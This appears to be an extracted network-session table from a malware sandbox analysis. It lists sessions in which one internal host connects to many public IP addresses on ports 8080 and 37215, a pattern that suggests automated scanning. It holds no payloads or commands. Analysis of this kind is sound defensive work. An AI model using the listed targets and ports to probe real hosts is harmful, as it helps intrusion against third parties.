                                                        16358192.168.2.233554298.223.235.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16359192.168.2.2350472205.64.51.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16360192.168.2.234404219.222.60.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16361192.168.2.2357274104.131.196.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16362192.168.2.2359532206.71.58.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16363192.168.2.235987817.222.181.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16364192.168.2.2356012116.103.71.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16365192.168.2.235903899.214.78.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16366192.168.2.235605065.108.155.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16367192.168.2.2350440184.216.118.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16368192.168.2.2350546111.54.228.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16369192.168.2.234638620.95.100.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16370192.168.2.234379669.187.201.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16371192.168.2.2342728123.210.229.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16372192.168.2.236076091.41.167.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16373192.168.2.2337178140.126.193.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16374192.168.2.233296293.205.164.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16375192.168.2.2346106120.131.222.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16376192.168.2.23571301.195.117.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16377192.168.2.2344514168.207.233.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16378192.168.2.234285858.241.236.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16379192.168.2.2333488190.80.137.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16380192.168.2.2336762190.12.52.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16381192.168.2.2355994134.148.217.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16382192.168.2.2359802216.238.93.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16383192.168.2.2344092196.167.111.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16384192.168.2.2342526139.89.248.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16385192.168.2.2353670150.41.5.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16386192.168.2.234447839.158.141.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16387192.168.2.2338264170.226.217.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16388192.168.2.2334502122.74.90.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16389192.168.2.2359296129.166.26.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16390192.168.2.2341712125.27.59.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16391192.168.2.2349434217.254.124.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16392192.168.2.234213636.208.239.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16393192.168.2.2351398144.29.17.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16394192.168.2.235321682.209.199.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16395192.168.2.235046492.227.78.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16396192.168.2.2333694101.145.217.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16397192.168.2.234865661.237.198.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16398192.168.2.234541070.200.27.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16399192.168.2.2335458196.20.60.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16400192.168.2.234485640.210.124.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16401192.168.2.2353272134.243.75.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16402192.168.2.235299617.216.136.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16403192.168.2.2346520129.247.245.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16404192.168.2.2338704145.214.110.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16405192.168.2.235786632.143.171.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16406192.168.2.2339884183.149.229.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16407192.168.2.233341268.109.162.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16408192.168.2.235893044.49.202.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16409192.168.2.2353052150.239.13.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16410192.168.2.2348454113.202.128.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16411192.168.2.235631877.17.183.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16412192.168.2.2345752141.138.174.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16413192.168.2.233658412.212.232.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16414192.168.2.2343598137.67.131.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16415192.168.2.234911840.55.224.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16416192.168.2.2342852140.164.32.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16417192.168.2.2355506124.142.130.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16418192.168.2.2348284171.151.167.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16419192.168.2.2340684125.156.18.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16420192.168.2.2354558123.65.145.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16421192.168.2.2337530167.56.14.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16422192.168.2.235754851.133.53.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16423192.168.2.2359980108.17.53.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16424192.168.2.2350642194.191.59.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16425192.168.2.2352000157.32.68.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16426192.168.2.2334810134.67.2.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16427192.168.2.2341190203.80.119.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16428192.168.2.2344184116.212.28.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16429192.168.2.235089053.143.194.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16430192.168.2.2360682213.232.151.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16431192.168.2.2350098172.240.166.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16432192.168.2.2336856183.142.168.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16433192.168.2.2347590199.179.88.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16434192.168.2.234337237.99.131.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16435192.168.2.2353924157.188.133.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16436192.168.2.235713057.9.106.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16437192.168.2.2337236157.14.118.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16438192.168.2.233799641.109.43.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16439192.168.2.2359896157.105.79.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16440192.168.2.2356872222.243.4.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16441192.168.2.235294241.40.155.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16442192.168.2.2358684102.8.63.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16443192.168.2.2336438197.165.171.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16444192.168.2.235593841.254.162.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16445192.168.2.2350150169.145.180.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16446192.168.2.2341386197.153.0.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16447192.168.2.2348596197.88.254.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16448192.168.2.233474041.73.1.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16449192.168.2.235391241.133.75.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16450192.168.2.2340796157.172.65.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16451192.168.2.2360278197.154.197.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16452192.168.2.2360118157.162.203.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16453192.168.2.2354276197.119.143.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16454192.168.2.2335202197.85.125.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16455192.168.2.2333814157.136.62.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16456192.168.2.235672841.24.242.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16457192.168.2.2352382197.190.229.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16458192.168.2.233768841.100.54.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16459192.168.2.2358526157.65.56.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16460192.168.2.235598231.214.208.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16461192.168.2.234261841.249.127.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16462192.168.2.2348762157.183.25.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16463192.168.2.233871294.1.225.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16464192.168.2.2339304157.183.39.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16465192.168.2.2335344197.217.121.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16466192.168.2.2346064197.55.142.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16467192.168.2.233884841.202.197.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16468192.168.2.234501641.98.12.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16469192.168.2.234082246.255.2.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16470192.168.2.2335636157.114.172.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16471192.168.2.2343380157.225.99.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16472192.168.2.2334620197.233.84.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16473192.168.2.2342524108.217.248.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16474192.168.2.2343230209.151.148.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16475192.168.2.2345402197.79.98.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16476192.168.2.2354914157.134.59.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16477192.168.2.2357280135.36.208.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16478192.168.2.2357672197.235.95.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16479192.168.2.2345398197.2.186.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16480192.168.2.235868841.61.112.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16481192.168.2.2353090129.64.167.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16482192.168.2.2343402197.186.61.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16483192.168.2.2358986161.158.94.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16484192.168.2.2340140197.251.180.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16485192.168.2.2354406197.178.117.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16486192.168.2.235027441.166.115.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16487192.168.2.2356392157.28.82.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16488192.168.2.2357882157.167.52.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16489192.168.2.235495641.94.35.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16490192.168.2.234706241.75.146.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16491192.168.2.2337344157.149.153.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16492192.168.2.2357250157.249.117.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16493192.168.2.2348152157.156.211.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16494192.168.2.2343746157.56.122.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16495192.168.2.2336692197.159.101.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16496192.168.2.2348384179.202.185.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16497192.168.2.2353070197.74.72.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16498192.168.2.233897641.170.127.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16499192.168.2.2345598157.116.87.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16500192.168.2.2343430197.210.58.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16501192.168.2.235042041.87.8.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16502192.168.2.2333076128.231.180.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16503192.168.2.2348750157.195.157.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16504192.168.2.2355884157.123.54.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16505192.168.2.234061241.2.199.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16506192.168.2.2356810197.119.77.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16507192.168.2.235690441.167.223.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16508192.168.2.235510641.145.90.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16509192.168.2.2340992197.8.129.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16510192.168.2.2353280197.237.201.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16511192.168.2.2347776157.93.26.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16512192.168.2.235427841.0.109.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16513192.168.2.2337232157.115.232.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16514192.168.2.2346872157.98.107.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16515192.168.2.2351642197.208.150.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16516192.168.2.233873041.74.215.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16517192.168.2.235923841.66.220.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16518192.168.2.2358832197.255.248.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16519192.168.2.2348876157.171.155.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16520192.168.2.2349800194.100.46.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16521192.168.2.2337300159.112.150.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16522192.168.2.2357472197.33.168.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16523192.168.2.2352202157.102.179.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16524192.168.2.2347968157.64.127.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16525192.168.2.2346202165.0.46.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16526192.168.2.233778817.97.66.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16527192.168.2.2343910197.17.135.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16528192.168.2.2340260154.120.33.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16529192.168.2.2342758142.156.255.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16530192.168.2.2356800166.187.226.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16531192.168.2.234363241.143.112.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16532192.168.2.2354718114.19.117.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16533192.168.2.2343060177.15.183.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16534192.168.2.2348196157.160.199.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16535192.168.2.2332830197.96.133.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16536192.168.2.2342106201.130.4.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16537192.168.2.233473241.15.241.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16538192.168.2.2333604197.2.61.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16539192.168.2.234404041.128.93.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16540192.168.2.235430041.5.190.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16541192.168.2.2335002197.242.128.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16542192.168.2.2344534197.114.116.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16543192.168.2.2340356199.126.119.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16544192.168.2.235731471.172.188.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16545192.168.2.2349772157.48.127.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16546192.168.2.2341036161.71.95.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16547192.168.2.234707841.24.127.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16548192.168.2.2352418157.149.172.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16549192.168.2.2349002197.56.17.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16550192.168.2.233961641.198.32.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16551192.168.2.234708041.42.161.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16552192.168.2.2349820157.166.86.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16553192.168.2.234137641.46.140.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16554192.168.2.2358784197.249.130.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16555192.168.2.234712041.203.0.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16556192.168.2.234582841.103.184.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16557192.168.2.2337886157.41.70.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16558192.168.2.2357484197.76.50.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16559192.168.2.233928041.232.169.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16560192.168.2.235229068.108.135.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16561192.168.2.2354984197.244.60.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16562192.168.2.234504841.177.95.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16563192.168.2.2356082197.236.246.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16564192.168.2.2355078151.205.101.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16565192.168.2.2359040197.8.251.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16566192.168.2.235681241.71.146.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16567192.168.2.2351824114.65.249.837215
                                                        TimestampBytes transferredDirectionData


